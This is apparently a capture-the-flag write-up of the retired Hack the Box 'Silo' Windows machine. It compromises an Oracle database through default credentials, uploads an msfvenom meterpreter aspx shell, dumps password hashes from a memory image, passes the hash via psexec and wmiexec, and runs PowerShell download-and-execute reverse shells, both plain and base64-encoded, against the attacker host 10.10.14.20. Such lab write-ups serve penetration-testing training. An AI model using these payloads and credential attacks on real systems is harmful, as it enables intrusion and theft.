Today we are going to solve another CTF challenge “Silo” which is available online for those who want to increase their skill in penetration testing and black box testing. Silo is a retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level: Expert
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.82 so let’s begin with nmap port enumeration.
root@kali:~/htb/silo# nmap -sC -sV -oA nmap 10.10.10.82 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-25 14:27 EDT Nmap scan report for 10.10.10.82 Host is up (0.031s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49158/tcp open msrpc Microsoft Windows RPC 49160/tcp open oracle-tns Oracle TNS listener (requires service name) 49161/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-25 14:29:41 |_ start_date: 2019-03-24 18:16:47 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 138.28 seconds
We have oracle database listening remotely on port 1521, we need to find the valid SID and credentials in order to connect to the database.
We first need to get the SID for the oracle service, so we use metasploit to brute force the valid SID.
msf5 > use auxiliary/admin/oracle/sid_brute msf5 auxiliary(admin/oracle/sid_brute) > set rhost 10.10.10.82 rhost => 10.10.10.82 msf5 auxiliary(admin/oracle/sid_brute) > run [*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt... [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE' [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
After install ODat, the next step is, we need to find which user is using default or weak credentials. This is the List of Oracle default credentials.
After testing, we can find a default credential:
Username: scott
Password: tiger
Then, we run command to get root.txt:
1
|
. /odat .py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --getFile "c:/Users/Administrator/Desktop" "root.txt" "spz.io" --sysdba |
after downloading Oracle tools from https://www.oracle.com/technetwork/topics/winx64soft-089540.html
Let’s try to login
c:\PENTEST\Oracle_instantclient_18_5>sqlplus -L scott/tiger@10.10.10.82 SQL*Plus: Release 18.0.0.0.0 - Production on Tue Mar 26 15:01:29 2019 Version 18.5.0.0.0 Copyright (c) 1982, 2018, Oracle. All rights reserved. ERROR: ORA-28002: the password will expire within 7 days Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production SP2-0310: unable to open file "LOGIN.SQL" SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT CONNECT NO YES NO SCOTT RESOURCE NO YES NO SQL>
let’s try
c:\PENTEST\Oracle_instantclient_18_5>sqlplus -L scott/tiger@10.10.10.82/XE as sysdba SQL*Plus: Release 18.0.0.0.0 - Production on Tue Mar 26 16:11:19 2019 Version 18.5.0.0.0 Copyright (c) 1982, 2018, Oracle. All rights reserved. Connected to: Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production SP2-0310: unable to open file "LOGIN.SQL" SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYS ADM_PARALLEL_EXECUTE_TASK YES YES NO SYS APEX_ADMINISTRATOR_ROLE YES YES NO SYS AQ_ADMINISTRATOR_ROLE YES YES NO SYS AQ_USER_ROLE YES YES NO SYS AUTHENTICATEDUSER YES YES NO SYS CONNECT YES YES NO SYS CTXAPP YES YES NO SYS DATAPUMP_EXP_FULL_DATABASE YES YES NO SYS DATAPUMP_IMP_FULL_DATABASE YES YES NO SYS DBA YES YES NO SYS DBFS_ROLE YES YES NO USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYS DELETE_CATALOG_ROLE YES YES NO SYS EXECUTE_CATALOG_ROLE YES YES NO SYS EXP_FULL_DATABASE YES YES NO SYS GATHER_SYSTEM_STATISTICS YES YES NO SYS HS_ADMIN_EXECUTE_ROLE YES YES NO SYS HS_ADMIN_ROLE YES YES NO SYS HS_ADMIN_SELECT_ROLE YES YES NO SYS IMP_FULL_DATABASE YES YES NO SYS LOGSTDBY_ADMINISTRATOR YES YES NO SYS OEM_ADVISOR YES YES NO SYS OEM_MONITOR YES YES NO USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYS PLUSTRACE YES YES NO SYS RECOVERY_CATALOG_OWNER YES YES NO SYS RESOURCE YES YES NO SYS SCHEDULER_ADMIN YES YES NO SYS SELECT_CATALOG_ROLE YES YES NO SYS XDBADMIN YES YES NO SYS XDB_SET_INVOKER YES YES NO SYS XDB_WEBSERVICES YES YES NO SYS XDB_WEBSERVICES_OVER_HTTP YES YES NO SYS XDB_WEBSERVICES_WITH_PUBLIC YES YES NO 32 rows selected.
We are unable to get a shell with reverse_tcp, so we use the reverse_https payload. We create a 64-bit payload as the nmap scan shows us that the Operating system is 64-bit windows server.
root@kali:~/htb/silo# msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.10.14.20 lport=443 -f aspx > Shell.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 748 bytes Final size of aspx file: 4869 bytes
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https payload => windows/x64/meterpreter/reverse_https msf5 exploit(multi/handler) > set lhost 10.10.14.20 lhost => 10.10.14.20 msf5 exploit(multi/handler) > set lport 443 lport => 443 msf5 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://10.10.14.20:443
./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U scott -P tiger --putFile "C:\inetpub\wwwroot\\" shell.aspx /tmp/Shell.aspx --sysdba
As soon as we run the shell on the target machine, we get a reverse shell.
Enumerating through the directories we find two files in “C:\Users\Phineas\Desktop” called “user.txt” and “Oracle issue.txt”. We take a look at the content of user.txt and find our first flag.
We take a look at the content of “Oracle issue.txt” and find a link to a dropbox and a password in which the first char is not being rendered by kali linux.
We find the unrecognized character to be the pound symbol (£). We use the password to login and find a zip file, we download the file into our system.
After downloading the zip file, we unzip it and find that it contains a memory dump. We use volatility tool to investigate the dump.
volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist
So we can dump the hashes with help of hash dump by supplying the need address which is SYSTEM and SAM
volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000 Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
So with help of the hashes, we can launch PTH since the machine has port 445 open.
As we have the password hash for “Administrator” we use Pass the Hash technique to get a privileged shell.
root@kali:~/htb/silo# msfconsole [-] ***rTing the Metasploit Framework console...| [-] * WARNING: No database support: No database YAML file [-] *** _ _ / \ /\ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ =[ metasploit v5.0.2-dev ] + -- --=[ 1852 exploits - 1046 auxiliary - 325 post ] + -- --=[ 541 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] + -- --=[ ** This is Metasploit 5 development branch ** ] msf5 > use exploit/windows/smb/psexec msf5 exploit(windows/smb/psexec) > set smbuser Administrator smbuser => Administrator msf5 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 smbpass => aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 msf5 exploit(windows/smb/psexec) > set rhost 10.10.10.82 rhost => 10.10.10.82 msf5 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.10.14.20:4444 [*] 10.10.10.82:445 - Connecting to the server... [*] 10.10.10.82:445 - Authenticating to 10.10.10.82:445 as user 'Administrator'... [*] 10.10.10.82:445 - Selecting PowerShell target [*] 10.10.10.82:445 - Executing the payload... [+] 10.10.10.82:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (179779 bytes) to 10.10.10.82 [*] Meterpreter session 1 opened (10.10.14.20:4444 -> 10.10.10.82:49163) at 2019-03-26 09:08:35 -0400 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
root@kali:~/htb/silo# pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd.exe E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH... Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami silo\administrator
root@kali:~/htb/silo# python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] Requesting shares on 10.10.10.82..... [*] Found writable share ADMIN$ [*] Uploading file JbNIPTbN.exe [*] Opening SVCManager on 10.10.10.82..... [*] Creating service cKNz on 10.10.10.82..... [*] Starting service cKNz..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
c:\PENTEST>wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami silo\administrator C:\>cmd.exe /c powershell.exe -nop IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.82 - - [26/Mar/2019 18:00:05] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.82: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.82] 49171: NO_DATA Windows PowerShell running as user Administrator on SILO Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\>whoami silo\administrator PS C:\> type c:\users\administrator\desktop\root.txt cd3*****af6 PS C:\>
pth-wmic doesn’t work on 64 bit Kali, however, pth-wmic works with no issues and apparently this has been a problem since 2013.
Let’s first encode our web delivery string:
root@kali:~# echo "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADQANAAzAC4AcABzADEAJwApAAoA
c:\Python37>python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.82 - - [26/Mar/2019 18:00:05] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\PENTEST>wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami silo\administrator C:\>cmd.exe /c powershell.exe -nop -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADQANAAzAC4AcABzADEAJwApAAoA
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.82: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.20] from (UNKNOWN) [10.10.10.82] 49173: NO_DATA Windows PowerShell running as user Administrator on SILO Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\>whoami silo\administrator PS C:\> [System.Environment]::Is64BitProcess True PS C:\> [System.Environment]::Is64BitOperatingSystem True
Author: Jacco Straathof